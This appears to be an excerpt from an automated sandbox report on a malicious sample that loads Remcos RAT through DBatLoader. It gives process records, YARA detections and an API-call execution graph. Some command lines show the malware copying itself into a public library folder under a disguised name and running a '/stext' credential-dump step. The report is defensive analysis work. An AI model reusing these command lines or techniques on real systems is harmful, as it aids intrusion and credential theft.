                                                                                                                                                                  Reputation:high
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:2
                                                                                                                                                                  Start time:17:04:00
                                                                                                                                                                  Start date:24/04/2024
                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Reputation:high
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:3
                                                                                                                                                                  Start time:17:04:00
                                                                                                                                                                  Start date:24/04/2024
                                                                                                                                                                  Path:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\user\Desktop\SHEOrder-10524.exe C:\\Users\\Public\\Libraries\\Wagotghl.PIF
                                                                                                                                                                  Imagebase:0xc0000
                                                                                                                                                                  File size:29'184 bytes
                                                                                                                                                                  MD5 hash:9472AAB6390E4F1431BAA912FCFF9707
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:4
                                                                                                                                                                  Start time:17:04:00
                                                                                                                                                                  Start date:24/04/2024
                                                                                                                                                                  Path:C:\Users\Public\Libraries\lhgtogaW.pif
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:C:\Users\Public\Libraries\lhgtogaW.pif
                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                  File size:68'096 bytes
                                                                                                                                                                  MD5 hash:C116D3604CEAFE7057D77FF27552C215
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Yara matches:
                                                                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000002.4155660149.000000002416C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000001.1717466391.0000000000490000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000004.00000001.1717466391.0000000000490000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                  • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000004.00000001.1717466391.0000000000490000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000002.4137990797.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000004.00000002.4137990797.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                  • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000004.00000002.4137990797.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                  • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000004.00000002.4137990797.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000004.00000002.4137990797.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000002.4156653259.0000000025BBF000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000002.4137990797.0000000000490000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000004.00000002.4137990797.0000000000490000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                  • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000004.00000002.4137990797.0000000000490000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000002.4155660149.000000002412E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000003.1775014710.0000000024164000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000002.4137990797.0000000000AC0000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000004.00000002.4137990797.0000000000AC0000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                  • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000004.00000002.4137990797.0000000000AC0000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000001.1717466391.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000004.00000001.1717466391.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                  • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000004.00000001.1717466391.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                  • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                  • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                  • Detection: 3%, ReversingLabs
                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                  Has exited:false

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:5
                                                                                                                                                                  Start time:17:04:06
                                                                                                                                                                  Start date:24/04/2024
                                                                                                                                                                  Path:C:\Users\Public\Libraries\lhgtogaW.pif
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:C:\Users\Public\Libraries\lhgtogaW.pif /stext "C:\Users\user\AppData\Local\Temp\zhrdpmieysz"
                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                  File size:68'096 bytes
                                                                                                                                                                  MD5 hash:C116D3604CEAFE7057D77FF27552C215
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:6
                                                                                                                                                                  Start time:17:04:06
                                                                                                                                                                  Start date:24/04/2024
                                                                                                                                                                  Path:C:\Users\Public\Libraries\lhgtogaW.pif
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:C:\Users\Public\Libraries\lhgtogaW.pif /stext "C:\Users\user\AppData\Local\Temp\kbfnqftxmarjte"
                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                  File size:68'096 bytes
                                                                                                                                                                  MD5 hash:C116D3604CEAFE7057D77FF27552C215
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:7
                                                                                                                                                                  Start time:17:04:06
                                                                                                                                                                  Start date:24/04/2024
                                                                                                                                                                  Path:C:\Users\Public\Libraries\lhgtogaW.pif
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:C:\Users\Public\Libraries\lhgtogaW.pif /stext "C:\Users\user\AppData\Local\Temp\mekgrxezaijovlxyi"
                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                  File size:68'096 bytes
                                                                                                                                                                  MD5 hash:C116D3604CEAFE7057D77FF27552C215
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:8
                                                                                                                                                                  Start time:17:04:12
                                                                                                                                                                  Start date:24/04/2024
                                                                                                                                                                  Path:C:\Users\Public\Libraries\Wagotghl.PIF
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:"C:\Users\Public\Libraries\Wagotghl.PIF"
                                                                                                                                                                  Imagebase:0xb70000
                                                                                                                                                                  File size:1'646'592 bytes
                                                                                                                                                                  MD5 hash:439F6DB2ADB770A0F825879C91DA9904
                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                  Programmed in:Borland Delphi
                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                  • Detection: 47%, ReversingLabs
                                                                                                                                                                  Reputation:low
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:10
                                                                                                                                                                  Start time:17:04:17
                                                                                                                                                                  Start date:24/04/2024
                                                                                                                                                                  Path:C:\Users\Public\Libraries\lhgtogaW.pif
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:C:\Users\Public\Libraries\lhgtogaW.pif
                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                  File size:68'096 bytes
                                                                                                                                                                  MD5 hash:C116D3604CEAFE7057D77FF27552C215
                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Yara matches:
                                                                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000A.00000001.1882448821.0000000000490000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000A.00000001.1882448821.0000000000490000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                  • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000A.00000001.1882448821.0000000000490000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000A.00000001.1882448821.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000A.00000001.1882448821.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                  • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000A.00000001.1882448821.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000A.00000001.1882448821.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000A.00000001.1882448821.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                  • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000A.00000001.1882448821.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                  • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000A.00000001.1882448821.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000A.00000001.1882448821.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:11
                                                                                                                                                                  Start time:17:04:19
                                                                                                                                                                  Start date:24/04/2024
                                                                                                                                                                  Path:C:\Users\Public\Libraries\Wagotghl.PIF
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:"C:\Users\Public\Libraries\Wagotghl.PIF"
                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                  File size:1'646'592 bytes
                                                                                                                                                                  MD5 hash:439F6DB2ADB770A0F825879C91DA9904
                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                  Programmed in:Borland Delphi
                                                                                                                                                                  Yara matches:
                                                                                                                                                                  • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 0000000B.00000002.1942171245.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                  Reputation:low
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:14
                                                                                                                                                                  Start time:17:04:22
                                                                                                                                                                  Start date:24/04/2024
                                                                                                                                                                  Path:C:\Users\Public\Libraries\lhgtogaW.pif
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:C:\Users\Public\Libraries\lhgtogaW.pif
                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                  File size:68'096 bytes
                                                                                                                                                                  MD5 hash:C116D3604CEAFE7057D77FF27552C215
                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Yara matches:
                                                                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000E.00000001.1938580336.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000E.00000001.1938580336.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                  • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000E.00000001.1938580336.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000E.00000001.1938580336.0000000000490000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000E.00000001.1938580336.0000000000490000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                  • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000E.00000001.1938580336.0000000000490000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000E.00000001.1938580336.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000E.00000001.1938580336.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                  • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000E.00000001.1938580336.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                  • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000E.00000001.1938580336.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000E.00000001.1938580336.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  Disassembly

                                                                                                                                                                  Reset < >

                                                                                                                                                                    Execution Graph

                                                                                                                                                                    Execution Coverage:16%
                                                                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                    Signature Coverage:26.2%
                                                                                                                                                                    Total number of Nodes:390
                                                                                                                                                                    Total number of Limit Nodes:21
                                                                                                                                                                    execution_graph 32906 28e4efe 33633 28c4824 32906->33633 33634 28c4835 33633->33634 33635 28c485b 33634->33635 33636 28c4872 33634->33636 33642 28c4b90 33635->33642 33651 28c4564 33636->33651 33639 28c4868 33640 28c48a3 33639->33640 33656 28c44f4 33639->33656 33643 28c4b9d 33642->33643 33650 28c4bcd 33642->33650 33644 28c4bc6 33643->33644 33646 28c4ba9 33643->33646 33647 28c4564 11 API calls 33644->33647 33662 28c2c44 11 API calls 33646->33662 33647->33650 33648 28c4bb7 33648->33639 33663 28c44a0 33650->33663 33652 28c458c 33651->33652 33653 28c4568 33651->33653 33652->33639 33676 28c2c10 33653->33676 33655 28c4575 33655->33639 33657 28c44f8 33656->33657 33660 28c4508 33656->33660 33659 28c4564 11 API calls 33657->33659 33657->33660 33658 28c4536 33658->33640 33659->33660 33660->33658 33661 28c2c2c 11 API calls 33660->33661 33661->33658 33662->33648 33664 28c44a6 33663->33664 33665 28c44c1 33663->33665 33664->33665 33667 28c2c2c 33664->33667 33665->33648 33668 28c2c3a 33667->33668 33669 28c2c30 33667->33669 33668->33665 33669->33668 33670 28c2d19 33669->33670 33674 28c64e4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 33669->33674 33675 28c2ce8 7 API calls 33670->33675 33673 28c2d3a 33673->33665 33674->33670 33675->33673 33677 28c2c27 33676->33677 33679 28c2c14 33676->33679 33677->33655 33678 28c2c1e 33678->33655 33679->33678 33680 28c2d19 33679->33680 33684 28c64e4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 33679->33684 33685 28c2ce8 7 API calls 33680->33685 33683 28c2d3a 33683->33655 33684->33680 33685->33683 33686 28c1c6c 33687 28c1c7c 33686->33687 33688 28c1d04 33686->33688 33689 28c1c89 33687->33689 33690 28c1cc0 33687->33690 33691 28c1d0d 33688->33691 33692 28c1f58 33688->33692 33695 28c1c94 33689->33695 33734 28c1724 33689->33734 33694 28c1724 10 API calls 33690->33694 33693 28c1d25 33691->33693 33711 28c1e24 33691->33711 33696 28c1fec 33692->33696 33699 28c1fac 33692->33699 33700 28c1f68 33692->33700 33697 28c1d2c 33693->33697 33703 28c1d48 33693->33703 33708 28c1dfc 33693->33708 33716 28c1cd7 33694->33716 33704 28c1fb2 33699->33704 33709 28c1724 10 API calls 33699->33709 33706 28c1724 10 API calls 33700->33706 33701 28c1e7c 33702 28c1724 10 API calls 33701->33702 33723 28c1e95 33701->33723 33707 28c1f2c 33702->33707 33714 28c1d9c 33703->33714 33715 28c1d79 Sleep 33703->33715 33705 28c1ca1 33724 28c1cb9 33705->33724 33758 28c1a8c 33705->33758 33710 28c1f82 33706->33710 33707->33723 33727 28c1a8c 8 API calls 33707->33727 33712 28c1724 10 API calls 33708->33712 33726 28c1fc1 33709->33726 33728 28c1a8c 8 API calls 33710->33728 33732 28c1fa7 33710->33732 33711->33701 33713 28c1e55 Sleep 33711->33713 33711->33723 33721 28c1e05 33712->33721 33713->33701 33717 28c1e6f Sleep 33713->33717 33715->33714 33718 28c1d91 Sleep 33715->33718 33722 28c1a8c 8 API calls 33716->33722 33725 28c1cfd 33716->33725 33717->33711 33718->33703 33720 28c1e1d 33721->33720 33731 28c1a8c 8 API calls 33721->33731 33722->33725 33729 28c1a8c 8 API calls 33726->33729 33726->33732 33730 28c1f50 33727->33730 33728->33732 33733 28c1fe4 33729->33733 33731->33720 33735 28c173c 33734->33735 33736 28c1968 33734->33736 33747 28c17cb Sleep 33735->33747 33749 28c174e 33735->33749 33737 28c1a80 33736->33737 33738 28c1938 33736->33738 33740 28c1a89 33737->33740 33741 28c1684 VirtualAlloc 33737->33741 33744 28c1947 Sleep 33738->33744 33752 28c1986 33738->33752 33739 28c175d 33739->33705 33740->33705 33742 28c16bf 33741->33742 33743 28c16af 33741->33743 33742->33705 33775 28c1644 33743->33775 33746 28c195d Sleep 33744->33746 33744->33752 33746->33738 33747->33749 33751 28c17e4 Sleep 33747->33751 33748 28c182c 33757 28c1838 33748->33757 33781 28c15cc 33748->33781 33749->33739 33749->33748 33750 28c180a Sleep 33749->33750 33750->33748 33754 28c1820 Sleep 33750->33754 33751->33735 33753 28c15cc VirtualAlloc 33752->33753 33755 28c19a4 33752->33755 33753->33755 33754->33749 33755->33705 33757->33705 33759 28c1b6c 33758->33759 33760 28c1aa1 33758->33760 33761 28c16e8 33759->33761 33762 28c1aa7 33759->33762 33760->33762 33765 28c1b13 Sleep 33760->33765 33764 28c1c66 33761->33764 33767 28c1644 2 API calls 33761->33767 33763 28c1ab0 33762->33763 33766 28c1b4b Sleep 33762->33766 33772 28c1b81 33762->33772 33763->33724 33764->33724 33765->33762 33768 28c1b2d Sleep 33765->33768 33769 28c1b61 Sleep 33766->33769 33766->33772 33770 28c16f5 VirtualFree 33767->33770 33768->33760 33769->33762 33771 28c170d 33770->33771 33771->33724 33773 28c1c00 VirtualFree 33772->33773 33774 28c1ba4 33772->33774 33773->33724 33774->33724 33776 28c1681 33775->33776 33777 28c164d 33775->33777 33776->33742 33777->33776 33778 28c164f Sleep 33777->33778 33779 28c1664 33778->33779 33779->33776 33780 28c1668 Sleep 33779->33780 33780->33777 33785 28c1560 33781->33785 33783 28c15d4 VirtualAlloc 33784 28c15eb 33783->33784 33784->33757 33786 28c1500 33785->33786 33786->33783 33787 28e9b48 33790 28dd5d0 33787->33790 33791 28dd5d8 33790->33791 33791->33791 36291 28c2ee0 QueryPerformanceCounter 33791->36291 33793 28dd5f9 33794 28dd603 InetIsOffline 33793->33794 33795 28dd60d 33794->33795 33796 28dd61e 33794->33796 33798 28c44f4 11 API calls 33795->33798 33797 28c44f4 11 API calls 33796->33797 33799 28dd62d 33797->33799 33800 28dd61c 33798->33800 33801 28c4824 11 API calls 33799->33801 33800->33799 33802 28dd64b 33801->33802 33803 28dd653 33802->33803 33804 28dd65d 33803->33804 36294 28c47b0 33804->36294 33806 28dd676 33807 28dd67e 33806->33807 33808 28dd688 33807->33808 36309 28d7be8 33808->36309 33811 28c4824 11 API calls 33812 28dd6af 33811->33812 33813 28dd6c1 33812->33813 33814 28c47b0 11 API calls 33813->33814 33815 28dd6da 33814->33815 33816 28dd6e2 33815->33816 33817 28dd6ec 33816->33817 33818 28d7be8 17 API calls 33817->33818 33819 28dd6f5 33818->33819 33820 28c4824 11 API calls 33819->33820 33821 28dd713 33820->33821 33822 28dd725 33821->33822 33823 28c47b0 11 API calls 33822->33823 33824 28dd73e 33823->33824 33825 28dd746 33824->33825 33826 28dd750 33825->33826 33827 28d7be8 17 API calls 33826->33827 33828 28dd759 33827->33828 33829 28c4824 11 API calls 33828->33829 33830 28dd777 33829->33830 33831 28dd77f 33830->33831 33832 28dd789 33831->33832 33833 28c47b0 11 API calls 33832->33833 33834 28dd7a2 33833->33834 36318 28c4964 33834->36318 33836 28dd7aa 33837 28dd7b4 33836->33837 33838 28d7be8 17 API calls 33837->33838 33839 28dd7bd 33838->33839 33840 28c4824 11 API calls 33839->33840 33841 28dd7db 33840->33841 33842 28dd7e3 33841->33842 33843 28dd7ed 33842->33843 33844 28c47b0 11 API calls 33843->33844 33845 28dd806 33844->33845 33846 28dd80e 33845->33846 33847 28dd818 33846->33847 33848 28d7be8 17 API calls 33847->33848 33849 28dd821 33848->33849 33850 28dd82e 33849->33850 33851 28dd83f 33850->33851 33852 28d7be8 17 API calls 33851->33852 33853 28dd848 33852->33853 33854 28dd855 33853->33854 33855 28d7be8 17 API calls 33854->33855 33856 28dd86f 33855->33856 33857 28dd87c 33856->33857 33858 28dd88d 33857->33858 33859 28d7be8 17 API calls 33858->33859 33860 28dd896 33859->33860 33861 28c4824 11 API calls 33860->33861 33862 28dd8b4 33861->33862 33863 28dd8bc 33862->33863 33864 28dd8c6 33863->33864 33865 28c47b0 11 API calls 33864->33865 33866 28dd8df 33865->33866 33867 28dd8e7 33866->33867 33868 28dd8f1 33867->33868 33869 28d7be8 17 API calls 33868->33869 33870 28dd8fa 33869->33870 33871 28dd907 33870->33871 33872 28dd918 33871->33872 33873 28d7be8 17 API calls 33872->33873 33874 28dd921 33873->33874 33875 28dd948 33874->33875 33876 28d7be8 17 API calls 33875->33876 33877 28dd954 33876->33877 33878 28dd964 33877->33878 36320 28c4698 33878->36320 36292 28c2eed 36291->36292 36293 28c2ef8 GetTickCount 36291->36293 36292->33793 36293->33793 36295 28c47b4 36294->36295 36296 28c4815 36294->36296 36297 28c47bc 36295->36297 36298 28c44f4 36295->36298 36297->36296 36299 28c47cb 36297->36299 36301 28c44f4 11 API calls 36297->36301 36302 28c4564 11 API calls 36298->36302 36304 28c4508 36298->36304 36303 28c4564 11 API calls 36299->36303 36300 28c4536 36300->33806 36301->36299 36302->36304 36306 28c47e5 36303->36306 36304->36300 36305 28c2c2c 11 API calls 36304->36305 36305->36300 36307 28c44f4 11 API calls 36306->36307 36308 28c4811 36307->36308 36308->33806 36310 28d7bfd 36309->36310 36311 28d7c05 LoadLibraryW GetModuleHandleW 36310->36311 36312 28c4964 36311->36312 36313 28d7c30 GetProcAddress 36312->36313 36322 28d7b20 36313->36322 36315 28d7c57 36331 28c44c4 36315->36331 36319 28c4968 36318->36319 36319->33836 36321 28c469e 36320->36321 36335 28c4538 36322->36335 36325 28c47b0 11 API calls 36326 28d7b53 36325->36326 36327 28d7b5b GetModuleHandleA GetProcAddress VirtualProtect 36326->36327 36328 28d7b97 36327->36328 36329 28c44c4 11 API calls 36328->36329 36330 28d7ba4 36329->36330 36330->36315 36333 28c44ca 36331->36333 36332 28c44f0 36332->33811 36333->36332 36334 28c2c2c 11 API calls 36333->36334 36334->36333 36337 28c453c 36335->36337 36336 28c4560 36336->36325 36337->36336 36338 28c2c2c 11 API calls 36337->36338 36338->36336 36339 28ea2f4 36349 28c6530 36339->36349 36343 28ea322 36354 28e9b54 timeSetEvent 36343->36354 36345 28ea32c 36346 28ea33a GetMessageA 36345->36346 36347 28ea32e TranslateMessage DispatchMessageA 36346->36347 36348 28ea34a 36346->36348 36347->36346 36350 28c653b 36349->36350 36355 28c415c 36350->36355 36353 28c4270 SysAllocStringLen SysFreeString SysReAllocStringLen 36353->36343 36354->36345 36356 28c41a2 36355->36356 36357 28c43ac 36356->36357 36358 28c421b 36356->36358 36361 28c43dd 36357->36361 36362 28c43ee 36357->36362 36369 28c40f4 36358->36369 36374 28c4320 GetStdHandle WriteFile GetStdHandle WriteFile MessageBoxA 36361->36374 36365 28c4433 FreeLibrary 36362->36365 36366 28c4457 36362->36366 36364 28c43e7 36364->36362 36365->36362 36367 28c4466 ExitProcess 36366->36367 36368 28c4460 36366->36368 36368->36367 36370 28c4137 36369->36370 36371 28c4104 36369->36371 36370->36353 36371->36370 36373 28c15cc VirtualAlloc 36371->36373 36375 28c582c 36371->36375 36373->36371 36374->36364 36376 28c583c GetModuleFileNameA 36375->36376 36377 28c5858 36375->36377 36379 28c5a90 GetModuleFileNameA RegOpenKeyExA 36376->36379 36377->36371 36380 28c5b13 36379->36380 36381 28c5ad3 RegOpenKeyExA 36379->36381 